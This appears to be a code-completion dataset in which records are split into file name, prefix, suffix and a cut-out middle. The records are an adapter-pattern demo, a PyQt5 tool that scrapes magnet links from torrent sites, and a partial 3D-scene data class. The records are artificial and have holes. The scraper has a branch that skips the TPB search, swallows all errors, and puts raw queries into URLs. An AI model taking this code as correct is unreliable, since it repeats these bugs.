plt.show() | else:
|
object_adapter.py | # This is the object-based adapter pattern
# It allows us to take an outside class 'StrangeCreature' with a different interface,
# and squeeze that SOB into another hierachy.
# The good thing about the object version of this pattern is that if StrangeCreature had
# a lot of subtypes, we would not need to write an adapter for each subtype.
#(I don't think this is relevant considering Pythons Dynamic Typing, but it's good to know for something like C++ I'm guessing)
import abc
class StrangeCreature(object):
def make_horrible_noise(self):
print("Rawr")
class | (object, metaclass=abc.ABCMeta):
@abc.abstractmethod
def make_noise(self):
raise NotImplementedError
class Horse(Animal):
def make_noise(self):
print("Vrinsk")
class Platypus(Animal):
_strange_creature = None
def __init__(self):
self._strange_creature = StrangeCreature()
def make_noise(self):
return self._strange_creature.make_horrible_noise()
p = Platypus()
p.make_noise()
h = Horse()
h.make_noise() | Animal |
search.py | import math
import re
import pyperclip
import requests
from bs4 import BeautifulSoup
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
import src.mglobals
path = src.mglobals.base_path
class Ui_searchMainWindow(object):
def copied_success_message(self):
successMessageBox = QMessageBox()
successMessageBox.setIcon(QMessageBox.Information)
successMessageBox.setText(
"Magnet links have been successfully copied to the clipboard.")
successMessageBox.setWindowTitle("Task Completed!")
successMessageBox.setStandardButtons(QMessageBox.Ok)
icon = QIcon()
icon.addPixmap(QPixmap(src.mglobals.icon), QIcon.Normal, QIcon.Off)
successMessageBox.setWindowIcon(icon)
successMessageBox.exec_()
def copy(self):
choice_row = self.tableTableWidget.currentRow()
choice_magnet = self.magnets[choice_row]
pyperclip.copy(choice_magnet)
self.copied_success_message()
def callback(self):
query = self.queryLineEdit.text()
limit = self.limitSlider.value()
def | ():
self.tableTableWidget.resizeColumnToContents(0)
self.tableTableWidget.resizeColumnToContents(1)
self.tableTableWidget.resizeColumnToContents(2)
self.tableTableWidget.resizeColumnToContents(3)
self.tableTableWidget.resizeColumnToContents(4)
def searched_success_message():
successMessageBox = QMessageBox()
successMessageBox.setIcon(QMessageBox.Information)
successMessageBox.setText(
"Magnet links have been successfully scraped.")
successMessageBox.setWindowTitle("Task Completed!")
successMessageBox.setStandardButtons(QMessageBox.Ok)
icon = QIcon()
icon.addPixmap(QPixmap(src.mglobals.icon), QIcon.Normal, QIcon.Off)
successMessageBox.setWindowIcon(icon)
successMessageBox.exec_()
def error_message():
errorMessageBox = QMessageBox()
errorMessageBox.setIcon(QMessageBox.Information)
errorMessageBox.setText(
"Something went wrong! Please inform me through GitHub!")
errorMessageBox.setWindowTitle("Error!")
errorMessageBox.setStandardButtons(QMessageBox.Ok)
icon = QIcon()
icon.addPixmap(QPixmap(src.mglobals.icon), QIcon.Normal, QIcon.Off)
errorMessageBox.setWindowIcon(icon)
errorMessageBox.exec_()
def x1377():
try:
main_link = "https://1377x.to/search/" + query + '/1/'
main_request = requests.get(
main_link, headers={'User-Agent': 'Mozilla/5.0'})
main_source = main_request.content
main_soup = BeautifulSoup(main_source, 'lxml')
limit_counter = 0
page_links_soup = main_soup.findAll(
'a', attrs={'href': re.compile("^/torrent/")})
for page_link in page_links_soup:
if limit_counter < limit:
page_link = "https://1377x.to" + page_link.get('href')
page_request = requests.get(
page_link, headers={'User-Agent': 'Mozilla/5.0'})
page_source = page_request.content
page_soup = BeautifulSoup(page_source, 'lxml')
title = (page_soup.find('h1').text).replace("\n", " ")
seeder = page_soup.find('span', class_="seeds").text
leecher = page_soup.find('span', class_="leeches").text
size = page_soup.findAll('span')[15].text
date = page_soup.findAll('span')[19].text
magnet = page_soup.find(
'a', attrs={'href': re.compile("^magnet:?")}).get('href')
row_position = self.tableTableWidget.rowCount()
self.tableTableWidget.insertRow(row_position)
self.tableTableWidget.setItem(
row_position, 0, QTableWidgetItem(title))
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(seeder))
self.tableTableWidget.setItem(row_position, 1, item)
self.tableTableWidget.setItem(
row_position, 2, QTableWidgetItem(leecher))
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(leecher))
self.tableTableWidget.setItem(row_position, 2, item)
self.tableTableWidget.setItem(
row_position, 3, QTableWidgetItem(size))
self.tableTableWidget.setItem(
row_position, 4, QTableWidgetItem(date))
self.tableTableWidget.setItem(
row_position, 5, QTableWidgetItem("1377x"))
self.magnets.append(magnet)
limit_counter = limit_counter + 1
except:
error_message()
def kat():
try:
main_link = "https://kat.rip/usearch/" + query
main_request = requests.get(
main_link, headers={'User-Agent': 'Mozilla/5.0'})
main_source = main_request.content
main_soup = BeautifulSoup(main_source, 'lxml')
titles_soup = main_soup.findAll('a', class_="cellMainLink")
seeders_soup = main_soup.findAll('td', class_="green center")
leechers_soup = main_soup.findAll(
'td', class_="red lasttd center")
sizes_soup = main_soup.findAll('td', class_="nobr center")
dates_soup = main_soup.findAll(
'td', class_="center", title=True)
magnets_soup = main_soup.findAll(
'a', attrs={'href': re.compile("^magnet:?"), 'title': "Torrent magnet link"})
titles = []
seeders = []
leechers = []
sizes = []
dates = []
limit_counter = 0
for title in titles_soup:
if limit_counter < limit:
titles.append(title.text)
limit_counter = limit_counter + 1
limit_counter = 0
for seeder in seeders_soup:
if limit_counter < limit:
seeders.append(seeder.text)
limit_counter = limit_counter + 1
limit_counter = 0
for leecher in leechers_soup:
if limit_counter < limit:
leechers.append(leecher.text)
limit_counter = limit_counter + 1
limit_counter = 0
for size in sizes_soup:
if limit_counter < limit:
sizes.append(size.text)
limit_counter = limit_counter + 1
limit_counter = 0
for date in dates_soup:
if limit_counter < limit:
dates.append(date.text)
limit_counter = limit_counter + 1
limit_counter = 0
count1 = 0
for magnet in magnets_soup:
if limit_counter < limit:
self.magnets.append(magnet.get('href'))
limit_counter = limit_counter + 1
count1 = count1 + 1
count2 = 0
while count2 < count1:
row_position = self.tableTableWidget.rowCount()
self.tableTableWidget.insertRow(row_position)
self.tableTableWidget.setItem(
row_position, 0, QTableWidgetItem(titles[count2]))
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(seeders[count2]))
self.tableTableWidget.setItem(row_position, 1, item)
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(leechers[count2]))
self.tableTableWidget.setItem(row_position, 2, item)
self.tableTableWidget.setItem(
row_position, 3, QTableWidgetItem(sizes[count2]))
self.tableTableWidget.setItem(
row_position, 4, QTableWidgetItem(dates[count2]))
self.tableTableWidget.setItem(
row_position, 5, QTableWidgetItem("KAT"))
count2 = count2 + 1
except:
error_message()
def nyaa():
try:
main_link = 'https://nyaa.si/?q=' + query
main_request = requests.get(
main_link, headers={'User-Agent': 'Mozilla/5.0'})
main_source = main_request.content
main_soup = BeautifulSoup(main_source, 'lxml')
titles_soup = main_soup.findAll('a', title=True, class_=False, attrs={
'href': re.compile("^/view/")})
seeders_soup = main_soup.findAll('td', class_="text-center")
leechers_soup = main_soup.findAll('td', class_="text-center")
sizes_soup = main_soup.findAll('td', class_="text-center")
dates_soup = main_soup.findAll('td', class_="text-center")
magnets_soup = main_soup.findAll(
'a', attrs={'href': re.compile("^magnet:?")})
titles = []
seeders = []
leechers = []
sizes = []
dates = []
limit_counter = 0
for title in titles_soup:
if limit_counter < limit:
titles.append(title.text)
limit_counter = limit_counter + 1
limit_counter = 0
for seeder in seeders_soup:
if limit_counter < limit*6:
seeders.append(seeder.text)
limit_counter = limit_counter + 1
limit_counter = 0
for leecher in leechers_soup:
if limit_counter < limit*6:
leechers.append(leecher.text)
limit_counter = limit_counter + 1
limit_counter = 0
for size in sizes_soup:
if limit_counter < limit*6:
sizes.append(size.text)
limit_counter = limit_counter + 1
limit_counter = 0
for date in dates_soup:
if limit_counter < limit*6:
dates.append(date.text)
limit_counter = limit_counter + 1
limit_counter = 0
count1 = 0
for magnet in magnets_soup:
if limit_counter < limit:
self.magnets.append(magnet.get('href'))
limit_counter = limit_counter + 1
count1 = count1 + 1
seeder1 = seeders[3]
seeders.pop(0)
seeders.pop(1)
seeders.pop(2)
seeders.pop(3)
seeders = seeders[6-1::6]
seeders.insert(0, seeder1)
leecher1 = leechers[4]
leechers.pop(0)
leechers.pop(1)
leechers.pop(2)
leechers.pop(3)
leechers.pop(4)
leechers = leechers[6-1::6]
leechers.insert(0, leecher1)
size1 = sizes[1]
sizes.pop(0)
sizes.pop(1)
sizes = sizes[6-1::6]
sizes.insert(0, size1)
date1 = dates[2]
dates.pop(0)
dates.pop(1)
dates.pop(2)
dates = dates[6-1::6]
dates.insert(0, date1)
count2 = 0
while count2 < count1:
row_position = self.tableTableWidget.rowCount()
self.tableTableWidget.insertRow(row_position)
self.tableTableWidget.setItem(
row_position, 0, QTableWidgetItem(titles[count2]))
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(seeders[count2]))
self.tableTableWidget.setItem(row_position, 1, item)
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(leechers[count2]))
self.tableTableWidget.setItem(row_position, 2, item)
self.tableTableWidget.setItem(
row_position, 3, QTableWidgetItem(sizes[count2]))
self.tableTableWidget.setItem(
row_position, 4, QTableWidgetItem(dates[count2]))
self.tableTableWidget.setItem(
row_position, 5, QTableWidgetItem("Nyaa"))
count2 = count2 + 1
except:
error_message()
def rarbg():
try:
token_url = "https://torrentapi.org/pubapi_v2.php?get_token=get_token&app_id=MagnetMagnet"
token_request = requests.get(token_url, headers={'User-Agent': 'Mozilla/5.0'})
token = token_request.json()["token"]
main_link = 'https://torrentapi.org/pubapi_v2.php?mode=search&search_string=' + \
query + '&token=' + token + '&format=json_extended&app_id=MagnetMagnet'
main_request = requests.get(
main_link, headers={'User-Agent': 'Mozilla/5.0'})
main_source = main_request.json()["torrent_results"]
limit_counter = 0
titles = []
seeders = []
leechers = []
sizes = []
dates = []
for item in main_source:
if limit_counter < limit:
def convert_size(size):
if size == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB",
"TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size, 1024)))
p = math.pow(1024, i)
s = round(size / p, 2)
size = "%s %s" % (s, size_name[i])
return size
titles.append(item["title"])
seeders.append(item["seeders"])
leechers.append(item["leechers"])
sizes.append(convert_size(item["size"]))
dates.append(item["pubdate"])
self.magnets.append(item["download"])
limit_counter += 1
else:
pass
print(titles)
count2 = 0
while count2 < limit_counter:
row_position = self.tableTableWidget.rowCount()
self.tableTableWidget.insertRow(row_position)
self.tableTableWidget.setItem(
row_position, 0, QTableWidgetItem(titles[count2]))
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(seeders[count2]))
self.tableTableWidget.setItem(row_position, 1, item)
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(leechers[count2]))
self.tableTableWidget.setItem(row_position, 2, item)
self.tableTableWidget.setItem(
row_position, 3, QTableWidgetItem(sizes[count2]))
self.tableTableWidget.setItem(
row_position, 4, QTableWidgetItem(dates[count2]))
self.tableTableWidget.setItem(
row_position, 5, QTableWidgetItem("RARBG"))
count2 = count2 + 1
except:
error_message()
def tpb():
try:
main_link = 'https://tpb.party/search/' + query + '/1/99/0/'
main_request = requests.get(
main_link, headers={'User-Agent': 'Mozilla/5.0'})
main_source = main_request.content
main_soup = BeautifulSoup(main_source, 'lxml')
titles_soup = main_soup.findAll('div', class_="detName")
seeders_soup = main_soup.findAll(
'td', attrs={'align': "right"})
seeders_soup = seeders_soup[0::2]
leechers_soup = main_soup.findAll(
'td', attrs={'align': "right"})
leechers_soup = leechers_soup[1::2]
sizes_soup = main_soup.findAll('font', class_="detDesc")
dates_soup = main_soup.findAll('font', class_="detDesc")
magnets_soup = main_soup.findAll(
'a', attrs={'href': re.compile("^magnet")})
titles = []
seeders = []
leechers = []
sizes = []
dates = []
limit_counter = 0
for title in titles_soup:
if limit_counter < limit:
title = title.text.replace("\n", "")
titles.append(title)
limit_counter = limit_counter + 1
limit_counter = 0
for seeder in seeders_soup:
if limit_counter < limit:
seeders.append(seeder.text)
limit_counter = limit_counter + 1
limit_counter = 0
for leecher in leechers_soup:
if limit_counter < limit:
leechers.append(leecher.text)
limit_counter = limit_counter + 1
limit_counter = 0
for size in sizes_soup:
if limit_counter < limit:
size = size.text.split(", ")
size = size[1].replace("Size ", "")
sizes.append(size)
limit_counter = limit_counter + 1
limit_counter = 0
for date in dates_soup:
if limit_counter < limit:
date = date.text.split(", ")
date = date[0].replace("Uploaded ", "")
dates.append(date)
limit_counter = limit_counter + 1
count1 = 0
limit_counter = 0
for magnet in magnets_soup:
if limit_counter < limit:
self.magnets.append(magnet.get('href'))
count1 = count1 + 1
limit_counter = limit_counter + 1
count2 = 0
while count2 < count1:
row_position = self.tableTableWidget.rowCount()
self.tableTableWidget.insertRow(row_position)
self.tableTableWidget.setItem(
row_position, 0, QTableWidgetItem(titles[count2]))
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(seeders[count2]))
self.tableTableWidget.setItem(row_position, 1, item)
item = QTableWidgetItem()
item.setData(Qt.DisplayRole, int(leechers[count2]))
self.tableTableWidget.setItem(row_position, 2, item)
self.tableTableWidget.setItem(
row_position, 3, QTableWidgetItem(sizes[count2]))
self.tableTableWidget.setItem(
row_position, 4, QTableWidgetItem(dates[count2]))
self.tableTableWidget.setItem(
row_position, 5, QTableWidgetItem("TPB"))
count2 = count2 + 1
except:
error_message()
if (self.x1377CheckBox.isChecked() and self.katCheckBox.isChecked() and self.nyaaCheckBox.isChecked() and self.rarbgCheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
kat()
nyaa()
rarbg()
tpb()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.katCheckBox.isChecked() and self.nyaaCheckBox.isChecked() and self.rarbgCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
kat()
nyaa()
rarbg()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.katCheckBox.isChecked() and self.nyaaCheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
kat()
nyaa()
tpb()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.katCheckBox.isChecked() and self.rarbgCheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
kat()
rarbg()
tpb()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.nyaaCheckBox.isChecked() and self.rarbgCheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
nyaa()
rarbg()
resize()
searched_success_message()
elif (self.katCheckBox.isChecked() and self.nyaaCheckBox.isChecked() and self.rarbgCheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
kat()
nyaa()
rarbg()
tpb()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.katCheckBox.isChecked() and self.nyaaCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
kat()
nyaa()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.katCheckBox.isChecked() and self.rarbgCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
kat()
rarbg()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.katCheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
kat()
tpb()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.nyaaCheckBox.isChecked() and self.rarbgCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
nyaa()
rarbg()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.nyaaCheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
nyaa()
tpb()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.rarbgCheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
rarbg()
tpb()
resize()
searched_success_message()
elif (self.katCheckBox.isChecked() and self.nyaaCheckBox.isChecked() and self.rarbgCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
kat()
nyaa()
rarbg()
resize()
searched_success_message()
elif (self.katCheckBox.isChecked() and self.nyaaCheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
kat()
nyaa()
tpb()
resize()
searched_success_message()
elif (self.nyaaCheckBox.isChecked() and self.rarbgCheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
nyaa()
rarbg()
tpb()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.katCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
kat()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.nyaaCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
nyaa()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.rarbgCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
rarbg()
resize()
searched_success_message()
elif (self.x1377CheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
tpb()
resize()
searched_success_message()
elif (self.katCheckBox.isChecked() and self.nyaaCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
kat()
nyaa()
resize()
searched_success_message()
elif (self.katCheckBox.isChecked() and self.rarbgCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
kat()
rarbg()
resize()
searched_success_message()
elif (self.katCheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
kat()
tpb()
resize()
searched_success_message()
elif (self.nyaaCheckBox.isChecked() and self.rarbgCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
nyaa()
rarbg()
resize()
searched_success_message()
elif (self.nyaaCheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
nyaa()
tpb()
resize()
searched_success_message()
elif (self.rarbgCheckBox.isChecked() and self.tpbCheckBox.isChecked()):
self.tableTableWidget.setRowCount(0)
self.magnets = []
rarbg()
tpb()
resize()
searched_success_message()
elif self.x1377CheckBox.isChecked():
self.tableTableWidget.setRowCount(0)
self.magnets = []
x1377()
resize()
searched_success_message()
elif self.katCheckBox.isChecked():
self.tableTableWidget.setRowCount(0)
self.magnets = []
kat()
resize()
searched_success_message()
elif self.nyaaCheckBox.isChecked():
self.tableTableWidget.setRowCount(0)
self.magnets = []
nyaa()
resize()
searched_success_message()
elif self.rarbgCheckBox.isChecked():
self.tableTableWidget.setRowCount(0)
self.magnets = []
rarbg()
resize()
searched_success_message()
elif self.tpbCheckBox.isChecked():
self.tableTableWidget.setRowCount(0)
self.magnets = []
tpb()
resize()
searched_success_message()
def setupUi(self, searchMainWindow):
searchMainWindow.setObjectName("searchMainWindow")
searchMainWindow.resize(1500, 400)
font = QFont()
font.setFamily("Bahnschrift Light")
font.setPointSize(11)
searchMainWindow.setFont(font)
icon = QIcon()
icon.addPixmap(QPixmap(src.mglobals.icon), QIcon.Normal, QIcon.Off)
searchMainWindow.setWindowIcon(icon)
self.centralwidget = QWidget(searchMainWindow)
self.centralwidget.setObjectName("centralwidget")
self.queryLineEdit = QLineEdit(self.centralwidget)
self.queryLineEdit.setGeometry(QRect(30, 20, 200, 20))
font = QFont()
font.setPointSize(9)
self.queryLineEdit.setFont(font)
self.queryLineEdit.setObjectName("queryLineEdit")
self.x1377CheckBox = QCheckBox(self.centralwidget)
self.x1377CheckBox.setGeometry(QRect(30, 70, 90, 20))
self.x1377CheckBox.setObjectName("x1377CheckBox")
self.tableTableWidget = QTableWidget(self.centralwidget)
self.tableTableWidget.setGeometry(QRect(260, 20, 1161, 360))
self.tableTableWidget.setObjectName("tableTableWidget")
self.tableTableWidget.setColumnCount(6)
self.tableTableWidget.setRowCount(0)
item = QTableWidgetItem()
self.tableTableWidget.setHorizontalHeaderItem(0, item)
item = QTableWidgetItem()
self.tableTableWidget.setHorizontalHeaderItem(1, item)
item = QTableWidgetItem()
self.tableTableWidget.setHorizontalHeaderItem(2, item)
item = QTableWidgetItem()
self.tableTableWidget.setHorizontalHeaderItem(3, item)
item = QTableWidgetItem()
self.tableTableWidget.setHorizontalHeaderItem(4, item)
item = QTableWidgetItem()
self.tableTableWidget.setHorizontalHeaderItem(5, item)
self.tableTableWidget.setSortingEnabled(True)
self.katCheckBox = QCheckBox(self.centralwidget)
self.katCheckBox.setGeometry(QRect(30, 110, 90, 20))
self.katCheckBox.setObjectName("katCheckBox")
self.nyaaCheckBox = QCheckBox(self.centralwidget)
self.nyaaCheckBox.setGeometry(QRect(30, 150, 90, 20))
self.nyaaCheckBox.setObjectName("nyaaCheckBox")
self.rarbgCheckBox = QCheckBox(self.centralwidget)
self.rarbgCheckBox.setGeometry(QRect(30, 190, 90, 20))
self.rarbgCheckBox.setObjectName("rarbgCheckBox")
self.tpbCheckBox = QCheckBox(self.centralwidget)
self.tpbCheckBox.setGeometry(QRect(30, 230, 90, 20))
self.tpbCheckBox.setObjectName("tpbCheckBox")
self.searchPushButton = QPushButton(self.centralwidget)
self.searchPushButton.setGeometry(QRect(30, 350, 90, 30))
font = QFont()
font.setPointSize(8)
self.searchPushButton.setFont(font)
self.searchPushButton.setObjectName("searchPushButton")
self.limitSlider = QSlider(self.centralwidget)
self.limitSlider.setGeometry(QRect(1450, 40, 22, 320))
self.limitSlider.setMaximum(20)
self.limitSlider.setPageStep(2)
self.limitSlider.setSliderPosition(10)
self.limitSlider.setOrientation(Qt.Vertical)
self.limitSlider.setObjectName("limitSlider")
self.minimumLabel = QLabel(self.centralwidget)
self.minimumLabel.setGeometry(QRect(1452, 365, 16, 16))
font = QFont()
font.setPointSize(9)
self.minimumLabel.setFont(font)
self.minimumLabel.setAlignment(Qt.AlignCenter)
self.minimumLabel.setObjectName("minimumLabel")
self.maximumLabel = QLabel(self.centralwidget)
self.maximumLabel.setGeometry(QRect(1452, 20, 16, 16))
font = QFont()
font.setPointSize(9)
self.maximumLabel.setFont(font)
self.maximumLabel.setAlignment(Qt.AlignCenter)
self.maximumLabel.setObjectName("maximumLabel")
searchMainWindow.setCentralWidget(self.centralwidget)
self.searchPushButton.clicked.connect(self.callback)
self.tableTableWidget.itemClicked.connect(self.copy)
self.retranslateUi(searchMainWindow)
QMetaObject.connectSlotsByName(searchMainWindow)
def retranslateUi(self, searchMainWindow):
_translate = QCoreApplication.translate
searchMainWindow.setWindowTitle(_translate(
"searchMainWindow", "MagnetMagnet - Search"))
self.x1377CheckBox.setText(_translate("searchMainWindow", "1377x"))
item = self.tableTableWidget.horizontalHeaderItem(0)
item.setText(_translate("searchMainWindow", "Titles"))
item = self.tableTableWidget.horizontalHeaderItem(1)
item.setText(_translate("searchMainWindow", "Seeders"))
item = self.tableTableWidget.horizontalHeaderItem(2)
item.setText(_translate("searchMainWindow", "Leechers"))
item = self.tableTableWidget.horizontalHeaderItem(3)
item.setText(_translate("searchMainWindow", "Sizes"))
item = self.tableTableWidget.horizontalHeaderItem(4)
item.setText(_translate("searchMainWindow", "Dates"))
item = self.tableTableWidget.horizontalHeaderItem(5)
item.setText(_translate("searchMainWindow", "Source"))
self.katCheckBox.setText(_translate("searchMainWindow", "KAT"))
self.nyaaCheckBox.setText(_translate("searchMainWindow", "Nyaa"))
self.rarbgCheckBox.setText(_translate("searchMainWindow", "RARBG"))
self.tpbCheckBox.setText(_translate("searchMainWindow", "TPB"))
self.searchPushButton.setText(_translate("searchMainWindow", "Search"))
self.minimumLabel.setText(_translate("searchMainWindow", "0"))
self.maximumLabel.setText(_translate("searchMainWindow", "20"))
| resize |
gtsfm_data.py | """Class to hold the tracks and cameras of a 3D scene.
This can be the output of either data association or of bundle adjustment.
Authors: Ayush Baid, John Lambert, Xiaolong Wu
"""
import itertools
from typing import Any, Dict, List, Optional, Tuple
import numpy as np
from gtsam import PinholeCameraCal3Bundler, Pose3, SfmTrack
import gtsfm.utils.graph as graph_utils
import gtsfm.utils.logger as logger_utils
import gtsfm.utils.reprojection as reproj_utils
logger = logger_utils.get_logger()
EQUALITY_TOLERANCE = 1e-5
PRINT_NUM_SIG_FIGS = 2
class GtsfmData:
"""Class containing cameras and tracks, essentially describing the complete 3D scene.
This class is needed over GTSAM's SfmData type because GTSAM's type does not allow for non-contiguous cameras.
The situation of non-contiguous cameras can exists because of failures in front-end.
"""
def __init__(self, number_images: int) -> None:
"""Initializes the class.
Args:
number_images: number of images/cameras in the scene.
"""
self._cameras: Dict[int, PinholeCameraCal3Bundler] = {}
self._tracks: List[SfmTrack] = []
self._number_images = number_images
def __eq__(self, other: object) -> bool:
"""Checks equality with the other object."""
if not isinstance(other, GtsfmData):
return False
if self._number_images != other.number_images():
return False
for i, cam in self._cameras.items():
other_cam = other.get_camera(i)
if not cam.equals(other_cam, EQUALITY_TOLERANCE):
return False
for j in range(self.number_tracks()):
track = self.get_track(j)
other_track = other.get_track(j)
if track.number_measurements() != other_track.number_measurements():
return False
for k in range(track.number_measurements()):
i, uv = track.measurement(k)
other_i, other_uv = other_track.measurement(k)
if i != other_i:
return False
if not np.allclose(uv, other_uv):
return False
return True
def number_images(self) -> int:
"""Getter for the number of images.
Returns:
Number of images.
"""
return self._number_images
def number_tracks(self) -> int:
"""Getter for the number of tracks.
Returns:
Number of tracks.
"""
return len(self._tracks)
def get_valid_camera_indices(self) -> List[int]:
"""Getter for image indices where there is a valid (not None) camera.
Returns:
List of indices with a valid camera.
"""
return list(self._cameras.keys())
def get_camera(self, index: int) -> Optional[PinholeCameraCal3Bundler]:
"""Getter for camera.
Args:
index: the image index to fetch the camera for.
Returns:
The camera if it is a valid one, None otherwise.
"""
return self._cameras.get(index)
def get_camera_poses(self) -> List[Optional[Pose3]]:
"""Getter for camera poses wTi.
This function returns the pose for all cameras (equal to number_images in GtsfmData), even if they were not
computed by the pipeline.
Returns:
camera poses as a list, each representing wTi
"""
cameras = [self.get_camera(i) for i in range(self.number_images())]
poses = [camera.pose() if camera is not None else None for camera in cameras]
return poses
def get_track(self, index: int) -> SfmTrack:
"""Getter for the track.
Args:
index: track index to fetch.
Returns:
Requested track.
"""
return self._tracks[index]
def add_track(self, track: SfmTrack) -> bool:
"""Add a track, after checking if all the cameras in the track are already added.
Args:
track: track to add.
Returns:
Flag indicating the success of adding operation.
"""
# check if all cameras are already added
for j in range(track.number_measurements()):
i, _ = track.measurement(j)
if i not in self._cameras:
return False
self._tracks.append(track)
return True
def add_camera(self, index: int, camera: PinholeCameraCal3Bundler) -> None:
"""Adds a camera.
Args:
index: the index associated with this camera.
camera: camera object to it.
Raises:
ValueError: if the camera to be added is not a valid camera object.
"""
if camera is None:
raise ValueError("Camera cannot be None, should be a valid camera")
self._cameras[index] = camera
def get_track_length_statistics(self) -> Tuple[float, float]:
"""Compute mean and median lengths of all the tracks.
Returns:
Mean track length.
Median track length.
"""
if self.number_tracks() == 0:
return 0, 0
track_lengths = self.get_track_lengths()
return np.mean(track_lengths), np.median(track_lengths)
def get_track_lengths(self) -> np.ndarray:
"""Get an array containing the lengths of all tracks.
Returns:
Array containing all track lengths.
"""
if self.number_tracks() == 0:
return np.array([], dtype=np.uint32)
track_lengths = [self.get_track(j).number_measurements() for j in range(self.number_tracks())]
return np.array(track_lengths, dtype=np.uint32)
def select_largest_connected_component(self) -> "GtsfmData":
"""Selects the subset of data belonging to the largest connected component of the graph where the edges are
between cameras which feature in the same track.
Returns:
New GtSfmData object with the subset of tracks and cameras.
"""
camera_edges = []
for sfm_track in self._tracks:
cameras_in_use = []
for m_idx in range(sfm_track.number_measurements()):
i, _ = sfm_track.measurement(m_idx)
cameras_in_use.append(i)
# Recreate track connectivity from track information
# For example: a track has cameras [0, 2, 5]. In that case we will add pairs (0, 2), (0, 5), (2, 5)
camera_edges += list(itertools.combinations(cameras_in_use, 2))
if len(camera_edges) == 0:
return GtsfmData(self._number_images)
cameras_in_largest_cc = graph_utils.get_nodes_in_largest_connected_component(camera_edges)
logger.info(
"Largest connected component contains {} of {} cameras returned by front-end (of {} total imgs)".format(
len(cameras_in_largest_cc), len(self.get_valid_camera_indices()), self._number_images
)
)
return GtsfmData.from_selected_cameras(self, cameras_in_largest_cc)
@classmethod
def from_selected_cameras(cls, gtsfm_data: "GtsfmData", camera_indices: List[int]) -> "GtsfmData":
"""Selects the cameras in the input list and the tracks associated with those cameras.
Args:
gtsfm_data: data to pick the cameras from.
camera_indices: camera indices to select and keep in the new data.
Returns:
New object with the selected cameras and associated tracks.
"""
new_data = cls(gtsfm_data.number_images())
for i in gtsfm_data.get_valid_camera_indices():
if i in camera_indices:
new_data.add_camera(i, gtsfm_data.get_camera(i))
new_camera_indices = new_data.get_valid_camera_indices()
# add tracks which have all the camera present in new data
for j in range(gtsfm_data.number_tracks()):
track = gtsfm_data.get_track(j)
is_valid = True
for k in range(track.number_measurements()):
i, _ = track.measurement(k)
if i not in new_camera_indices:
is_valid = False
break
if is_valid:
new_data.add_track(track)
return new_data
def get_scene_reprojection_errors(self) -> np.ndarray:
|
def aggregate_metrics(self) -> Dict[str, Any]:
"""Aggregate metrics about the reprojection errors and 3d track lengths (summary stats).
Args:
ba_data: bundle adjustment result
Returns:
dictionary containing metrics of bundle adjustment result
"""
track_lengths_3d = self.get_track_lengths()
scene_reproj_errors = self.get_scene_reprojection_errors()
